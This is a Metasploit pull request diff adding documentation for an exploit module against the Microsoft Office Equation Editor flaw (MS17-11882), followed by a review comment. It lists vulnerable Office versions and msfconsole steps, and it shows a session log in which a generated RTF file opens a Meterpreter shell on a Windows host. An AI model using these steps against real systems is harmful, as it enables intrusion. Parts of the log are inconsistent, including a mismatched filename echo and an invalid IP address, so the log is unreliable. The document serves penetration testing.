Land #9226, Microsoft Office OLE object memory corruption
Showing 2 changed files with 368 additions and 0 deletions.
53 changes: 53 additions & 0 deletions
documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
@@ -0,0 +1,53 @@ | ||
|
||
Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory. | ||
|
||
## Vulnerable Application | ||
|
||
- Microsoft Office 2016 | ||
- Microsoft Office 2013 Service Pack 1 | ||
- Microsoft Office 2010 Service Pack 2 | ||
- Microsoft Office 2007 | ||
|
||
## Verification Steps | ||
|
||
1. Start msfconsole | ||
2. Do: `use exploit/windows/fileformat/office_ms17_11882` | ||
3. Do: `set PAYLOAD [PAYLOAD]` | ||
4. Do: `run` | ||
|
||
## Options | ||
### FILENAME | ||
Filename to output, and location to which should be written. | ||
|
||
|
||
## Example | ||
|
||
``` | ||
msf > use exploit/windows/fileformat/office_ms17_11882 | ||
msf exploit(office_ms17_11882) > set FILENAME msf.rtf | ||
FILENAME => /home/mumbai/file.rtf | ||
msf exploit(office_ms17_11882) > set LHOST ens3 | ||
LHOST => ens3 | ||
msf exploit(office_ms17_11882) > set LPORT 35116 | ||
LPORT => 35116 | ||
msf exploit(office_ms17_11882) > run | ||
[*] Using URL: http://0.0.0.0:8080/BUY0DYgc | ||
[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc | ||
[*] Server started. | ||
[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24 | ||
[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending | ||
[*] Sending stage (205379 bytes) to 192.168.0.24 | ||
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500 | ||
sessions -i 1 | ||
[*] Starting interaction with 1... | ||
meterpreter > sysinfo | ||
Computer : TEST-PC | ||
OS : Windows 7 (Build 7601, Service Pack 1). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 1 | ||
Meterpreter : x64/windows | ||
meterpreter > | ||
``` |
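Review bot: the Example transcript in this hunk is internally inconsistent and should be regenerated from a real session before merging: `set FILENAME msf.rtf` is answered with `FILENAME => /home/mumbai/file.rtf`, and the `Local IP` line reads `http://192.1668.0.11:8080/BUY0DYgc`, which is not a valid address. The transcript also shows the module starting an HTTP server (`Using URL: http://0.0.0.0:8080/BUY0DYgc`) and serving a second stage, so the Verification Steps should include `set LHOST` (the example sets LHOST and LPORT, steps 1 to 4 do not) and the step of opening the generated RTF on the target, and the Options section should describe the server-side settings the example depends on rather than only FILENAME. The opening paragraph also needs a grammar pass ("a flaw in how the Equation Editor that allows", "to which fails to properly handle"), its claim of code execution "without interaction" sits oddly beside a fileformat module whose payload only runs once the RTF is opened, and "Filename to output, and location to which should be written." under FILENAME is unclear; something like "Name of the RTF file to generate" would do.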